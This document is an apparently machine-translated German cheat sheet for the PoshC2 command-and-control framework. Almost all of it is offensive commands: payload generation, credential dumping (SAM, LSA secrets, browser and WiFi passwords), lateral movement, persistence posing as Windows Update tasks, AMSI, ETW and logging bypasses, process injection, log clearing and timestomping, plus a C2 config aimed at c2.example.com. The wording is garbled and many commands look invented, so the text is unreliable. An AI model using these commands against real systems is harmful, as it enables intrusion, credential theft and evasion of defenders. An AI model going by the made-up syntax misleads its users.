PoshC2 Framework Cheat Sheet¶
Überblick¶
PoshC2 ist ein von Nettitude entwickeltes Proxy-Aware C2-Framework für rote Teaming- und Post-Exploitation-Aktivitäten. Es verfügt über PowerShell-Ausbeutungsfunktionen, seitliche Bewegungswerkzeuge und umfassende Proxy-Unterstützung für den Betrieb in eingeschränkten Netzwerkumgebungen.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.
Installation¶
Ubuntu/Debian Installation¶
```bash
Update system¶
sudo apt update && sudo apt upgrade -y
Install dependencies¶
sudo apt install curl python3 python3-pip python3-dev git build-essential
Clone PoshC2¶
git clone https://github.com/nettitude/PoshC2.git cd PoshC2
Install PoshC2¶
sudo ./Install.sh
Alternative pip installation¶
pip3 install poshc2 ```_
Docker Installation¶
```bash
Pull PoshC2 Docker image¶
docker pull nettitude/poshc2
Run PoshC2 in Docker¶
docker run -it -p 443:443 -p 80:80 nettitude/poshc2
Run with persistent data¶
docker run -it -v /opt/poshc2:/opt/PoshC2_Project nettitude/poshc2 ```_
Manuelle Installation¶
```bash
Install Python dependencies¶
pip3 install -r requirements.txt
Install additional tools¶
sudo apt install mingw-w64 mono-mcs
Set up database¶
python3 -c "from poshc2.server.database.DBUtil import *; initializedb()" ```_
Basisnutzung¶
Starten von PoshC2 Server¶
```bash
Start PoshC2 server¶
poshc2 --start
Start with custom configuration¶
poshc2 --start --config /path/to/config.yml
Start with specific project¶
poshc2 --start --project MyProject ```_
Neues Projekt erstellen¶
```bash
Create new project¶
poshc2 --new-project ProjectName
List projects¶
poshc2 --list-projects
Switch project¶
poshc2 --project ProjectName ```_
Befehlsnummer¶
Serververwaltung¶
| Command | Description |
|---|---|
help |
Display help menu |
show-urls |
Show payload URLs |
list-implants |
List active implants |
implant-handler |
Enter implant handler |
quit |
Exit PoshC2 |
Implant Handler Befehle¶
| Command | Description |
|---|---|
help |
Show implant commands |
back |
Return to main menu |
list-implants |
List all implants |
use <implant-id> |
Select implant |
kill <implant-id> |
Kill implant |
remove-implant <implant-id> |
Remove implant from database |
Implant Interaction¶
| Command | Description |
|---|---|
help |
Show available commands |
shell <command> |
Execute shell command |
upload-file <local> <remote> |
Upload file |
download-file <remote> |
Download file |
screenshot |
Take screenshot |
get-system |
Attempt privilege escalation |
Nutzlasterzeugung¶
PowerShell Payloads¶
```bash
Generate PowerShell payload¶
poshc2 --gen-payload powershell
Generate encoded PowerShell¶
poshc2 --gen-payload powershell --encoded
Generate PowerShell with proxy¶
poshc2 --gen-payload powershell --proxy http://proxy:8080 ```_
Ausführbare Payloads¶
```bash
Generate Windows executable¶
poshc2 --gen-payload exe
Generate DLL payload¶
poshc2 --gen-payload dll
Generate service executable¶
poshc2 --gen-payload service-exe ```_
Web Payloads¶
```bash
Generate HTA payload¶
poshc2 --gen-payload hta
Generate macro payload¶
poshc2 --gen-payload macro
Generate JavaScript payload¶
poshc2 --gen-payload js ```_
Linux Payloads¶
```bash
Generate Linux Python payload¶
poshc2 --gen-payload py
Generate Linux shell payload¶
poshc2 --gen-payload sh
Generate Linux ELF payload¶
poshc2 --gen-payload elf ```_
Proxy Konfiguration¶
HTTP Proxy Support¶
```bash
Configure HTTP proxy¶
set-proxy http://proxy.company.com:8080
Configure authenticated proxy¶
set-proxy http://username:password@proxy.company.com:8080
Configure SOCKS proxy¶
set-proxy socks5://proxy.company.com:1080 ```_
Proxy-Kettenkonfiguration¶
```bash
Multiple proxy configuration¶
set-proxy-chain http://proxy1:8080,socks5://proxy2:1080
Proxy with authentication¶
set-proxy-chain http://user:pass@proxy1:8080,http://proxy2:3128 ```_
Proxy-Testing¶
```bash
Test proxy connectivity¶
test-proxy http://proxy.company.com:8080
Test proxy authentication¶
test-proxy http://username:password@proxy.company.com:8080 ```_
Post-Exploitationsbefehle¶
Systeminformationen¶
```bash
Get system information¶
get-computerinfo
Get current user¶
whoami
Get domain information¶
get-domain
Get local users¶
get-localuser
Get local groups¶
get-localgroup ```_
Credential Harvesting¶
```bash
Dump SAM database¶
hashdump
Dump LSA secrets¶
lsa-secrets
Dump cached credentials¶
cachedump
Extract browser passwords¶
get-browserdata
Dump WiFi passwords¶
get-wifipasswords ```_
Active Directory Enumeration¶
```bash
Get domain controllers¶
get-domaincontroller
Get domain users¶
get-domainuser
Get domain groups¶
get-domaingroup
Get domain computers¶
get-domaincomputer
Get domain admins¶
get-domainadmin ```_
Spätere Bewegung¶
```bash
WMI execution¶
invoke-wmiexec -target 192.168.1.10 -command "whoami"
PSExec execution¶
invoke-psexec -target 192.168.1.10 -command "whoami"
SMB execution¶
invoke-smbexec -target 192.168.1.10 -command "whoami"
DCOM execution¶
invoke-dcomexec -target 192.168.1.10 -command "whoami" ```_
Persistenz¶
```bash
Registry persistence¶
new-persistence -method registry -key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
Scheduled task persistence¶
new-persistence -method scheduledtask -taskname "WindowsUpdate"
Service persistence¶
new-persistence -method service -servicename "WindowsUpdateService"
WMI persistence¶
new-persistence -method wmi -eventname "ProcessStart" ```_
Erweiterte Funktionen¶
PowerShell Module¶
```bash
Load PowerShell module¶
loadmodule /path/to/module.ps1
Import PowerView¶
loadmodule PowerView
Import Invoke-Mimikatz¶
loadmodule Invoke-Mimikatz
Import PowerUp¶
loadmodule PowerUp ```_
. Ausführung der NET-Montage¶
```bash
Execute .NET assembly¶
run-exe /path/to/assembly.exe arguments
Execute in memory¶
run-exe-inmemory /path/to/assembly.exe arguments
Reflective DLL loading¶
invoke-reflectivedllinjection /path/to/dll.dll ```_
Prozessinjektion¶
```bash
Inject into process¶
inject-shellcode -processid 1234 -shellcode
Process hollowing¶
invoke-processhollowing -target notepad.exe -payload /path/to/payload.exe
DLL injection¶
invoke-dllinjection -processid 1234 -dllpath /path/to/dll.dll ```_
Netzwerkaktivitäten¶
```bash
Port scanning¶
invoke-portscan -hosts 192.168.1.0/24 -ports 22,80,443,3389
Network discovery¶
invoke-networkscan -subnet 192.168.1.0/24
SMB enumeration¶
invoke-smbenum -target 192.168.1.10
Share enumeration¶
invoke-shareenum -target 192.168.1.10 ```_
Evasion Techniken¶
AMSI Bypass¶
```bash
AMSI bypass¶
amsi-bypass
Custom AMSI bypass¶
amsi-bypass -method custom
Reflection-based bypass¶
amsi-bypass -method reflection ```_
ETW Bypass¶
```bash
ETW bypass¶
etw-bypass
Disable ETW logging¶
disable-etw
Patch ETW functions¶
patch-etw ```_
PowerShell Logging Bypass¶
```bash
Disable PowerShell logging¶
disable-pslogging
Bypass script block logging¶
bypass-scriptblocklogging
Disable module logging¶
disable-modulelogging ```_
Obfuskation¶
```bash
Obfuscate PowerShell command¶
invoke-obfuscation -command "Get-Process"
String obfuscation¶
obfuscate-string "sensitive string"
Variable obfuscation¶
obfuscate-variables ```_
Pivoting und Tunneling¶
SOCKEN Proxy¶
```bash
Start SOCKS proxy¶
start-socksproxy -port 1080
Stop SOCKS proxy¶
stop-socksproxy
List proxy connections¶
list-socksproxy ```_
Port Forwarding¶
```bash
Local port forward¶
portforward -localport 8080 -remotehost 192.168.2.10 -remoteport 80
Reverse port forward¶
portforward -reverse -localport 9090 -remotehost 127.0.0.1 -remoteport 22
Stop port forward¶
stop-portforward -id 1 ```_
Beacon Chaining¶
```bash
Create beacon chain¶
new-beacon -parent
List beacon chains¶
list-beacons
Remove beacon chain¶
remove-beacon -id
Operationelle Sicherheit¶
Kommunikationssicherheit¶
```bash
Use HTTPS communications¶
set-comms https
Custom User-Agent¶
set-useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
Custom headers¶
set-headers "X-Forwarded-For: 192.168.1.100"
Domain fronting¶
set-domainfront cdn.example.com ```_
Sicherheit am Arbeitsplatz¶
```bash
Encrypt payloads¶
encrypt-payload -key "encryption-key"
Sign payloads¶
sign-payload -cert /path/to/cert.pfx
Obfuscate payloads¶
obfuscate-payload -method xor ```_
Anti-Forensik¶
```bash
Clear event logs¶
clear-eventlogs
Timestomp files¶
timestomp -file /path/to/file -time "01/01/2020 12:00:00"
Secure delete¶
sdelete -file /path/to/file
Clear tracks¶
clear-tracks ```_
Fehlerbehebung¶
Verbindungsprobleme¶
```bash
Check implant connectivity¶
test-connectivity
Verify proxy settings¶
show-proxy
Test DNS resolution¶
test-dns google.com
Check firewall rules¶
get-firewallrules ```_
Ausgabe von Payload¶
```bash
Regenerate payloads¶
regenerate-payloads
Test payload execution¶
test-payload /path/to/payload.exe
Check AV detection¶
test-av /path/to/payload.exe ```_
Leistungsfragen¶
```bash
Adjust beacon interval¶
set-beacon-time 30
Optimize jitter¶
set-jitter 0.2
Reduce payload size¶
compress-payload ```_
Datenbankprobleme¶
```bash
Repair database¶
repair-database
Backup database¶
backup-database /path/to/backup
Restore database¶
restore-database /path/to/backup ```_
Konfiguration¶
Serverkonfiguration¶
```yaml
config.yml¶
PayloadCommsHost: "https://c2.example.com" PayloadCommsPort: "443" DomainFrontHeader: "cdn.example.com" UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" Referrer: "https://google.com" ServerHeader: "Apache/2.4.41" HTTPResponse: "404" ```_
Proxy Konfiguration¶
```yaml
Proxy settings¶
ProxyURL: "http://proxy.company.com:8080" ProxyUser: "username" ProxyPass: "password" ProxyType: "http" # http, socks4, socks5 ```_
Ressourcen¶
- PoshC2 GitHub Repository
- PoshC2 Dokumentation
- [Nettitude Blog](LINK_4__
- PoshC2 Wiki
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von PoshC2 Framework. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *